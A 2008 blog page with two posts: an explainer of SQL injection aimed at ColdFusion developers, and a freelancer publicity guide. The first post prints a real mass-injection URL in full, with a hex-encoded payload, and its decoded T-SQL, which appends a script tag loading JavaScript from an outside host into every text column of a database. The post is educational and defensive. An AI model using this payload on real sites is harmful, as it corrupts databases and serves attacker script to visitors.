What is a SQL Injection Attack

Wednesday, 13th August 2008 in Development by Simon | 1 comment

Over the past few weeks, subversive elements in the international arena have decided that attacking websites is a fun thing to do! The online world has become the new battle ground between nations vying to de-stabilise rivals. This may seem all very Jack Bauer, but we are increasingly seeing ‘SQL injection attacks’ eminating from countries such as Russia, China and North Korea. Of course, that doesn’t mean our countries aren’t doing the same in return, but we only see the results from foreign-based attacks.

What is a SQL Injection Attack?

SQL Injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

Real World Example

SQL Injection attacks are commonly associated with a technique called Cross-Site Scripting (XSS). XSS is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.

In reality, what does this look like?

The following is a legitimate URL that may be navigated to by the user agent:

http://www.domain.com/folderName/fileName.cfm?variable1=0&variable2=4241

The following is a hacked URL:

http://www.domain.com/folderName/filename.cfm?
variable1=0&variable2=4241;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636861722
8323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F522
0464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C7
56D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E787479706
53D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204
F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E5
44F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746
5205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697
074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272720776
865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D226874747
03A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854204
6524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736
F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

The code appended to the URL is hexadecimal. This can be interpreted by the SQL engine. When the hexadecimal string is decoded by the SQL server, the SQL code generated looks similar to the following:

DECLARE @T varchar(255),@C varchar(4000) 
DECLARE Table_Cursor CURSOR 
FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b 
WHERE a.id=b.id 
AND a.xtype='u' 
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT FROM  Table_Cursor 
INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title>
<script src="http://1.verynx.cn/w.js"></script><!--'' 
where '+@C+' not like ''%"></title>
<script src="http://1.verynx.cn/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

Somewhat unhelpfully, if the user credentials used to access the database have access to the system tables of your database, the SQL injection attack will be able to interrogate those system tables and determine the structure of your database. The result, of the above example, is that the following code is injected into every string-based column in every table.

</title><script src="http://1.verynx.cn/w.js"></script><!--

To put it simply, this is very bad news!

ColdFusion-hacking is Popularised

ColdFusion-based sites are by no means immune to this international ‘information war’. The popularity of attacks on ColdFusion-based websites can be summarised by the fact that an article was featured on The Hacker Webzine recently, detailing how to implement a successful attack.

How to ‘Fix’ the Problem

As ColdFusion developers we not only need to be aware of the problem, we need to also know how to fix the problem and mitigate against an attack before it even happens.

In my next post, I will discuss how to fix a SQL injection attack.

Launching Yourself as a Freelancer – Publicity

Wednesday, 6th August 2008 in Strategy by Simon | 5 comments

In the first part of this series I talked about setting yourself up in business. The next step is to publicise yourself and your skills. At this point, it is helpful to know exactly what line of work you want to be focusing on, since you will need to target your efforts.

In the dim and distant past, the job of publicising yourself was extremely difficult. Can you imagine life without the Internet, mobile telephones and email? How did people ever do business? With the advent of the World Wide Web and in particular search engines and blogging, this all changed and a wealth of opportunity has become available, especially to the freelancer.

But where do you start?

Create a Brand

Creating a brand is a great way to market yourself. This does not have to be the same as your company, and through time you may set up different brands for different sectors or ideas you may have. Brands serve to create associations and therefore, expectations of products you create, so a good brand name is a great way to get recognised in your community.

You can register the brand in the UK, Europe and the US, although the latter requires a US address. It is also not a given that your brand registration will be successful, making it a costly exercise. Careful consideration is what is needed here.

Create an Avatar

Avatars are images or icons that represent you in the online world. They are an extension of your brand. For example, the header of my website is also my favicon and avatar on various online services. It is a great way for people to draw an association between your online presence and you.

Create a Blog

Blogs are a great way to get yourself known and therefore heard amongst your peer group. Your blog should really be an extension of your brand and is a great avenue to showcase your skills, demo example applications, code and designs, or simply give your opinion on a subject.

I use the excellent WordPress blogging application, in a self-hosted environment. You don’t need to do this since there is a hosted version at WordPress.com, or you could use Blogger, another popular blogging platform, provided by Google.

The key to blogging is talk about what you enjoy, don’t just keep it technical. Blogs should be an extension of you, not an avenue for pretentious comment; you’ll soon be found out!

If you go the self-hosted route, you’ll need a domain name, hosting provider and obviously a blog application. I have listed a few below that can get you started.

Domain Names:

Hosting Providers:

Blog Applications:

If going the self-hosted is all too complicated for you or you simply don’t want the hassle that is associated with self-hosting, all is not lost. WordPress.com and Blogger are for you.

Blog Hosting Providers:

Both services take the onus away from the user when it comes to management (backups, plugins etc). At the simplest level, all you need to do is create and publish the content.

Join feed aggregators

To get noticed in the blogosphere, you can’t simply rely on the Google, Yahoo! and Microsoft search engines ranking your site. You will need to alert your peers to the fact that you’ve created some content that is worth reading. You can achieve this with feed aggregators.

Below I list a few that I use:

If you use WordPress, then you’re in luck. WordPress has a service called Ping-o-matic, which updates different search engines when your blog has been updated. You can also add your own services to ping and therefore notify the service of new content.

Comment on Blogs

Commenting on blogs is another great way of getting yourself known as well as offering an opinion. Since comments allow you to include a link back to your website, try and comment as your brand.

One tip, try not to be defamatory towards the blog owner, or others unless you have a strong justification for doing so. It’s all about the karma!

Join Micro-Blogging Services

If blogging is not your thing or you don’t have time to write articles, there are a number of blogging and, more importantly, micro-blogging services available to you that allow you to get your thoughts out into the wide-world.

Such services include the not-always-venerable Twitter, the feature rich Pownce, the new kid on the block Plurk and the blogging service, Tumblr.

Building a following will allow you to announce to your followers important events and ask questions of them.

What’s Next

In the next part of this series, I’ll talk about networking, a natural extension to publicising yourself on the web.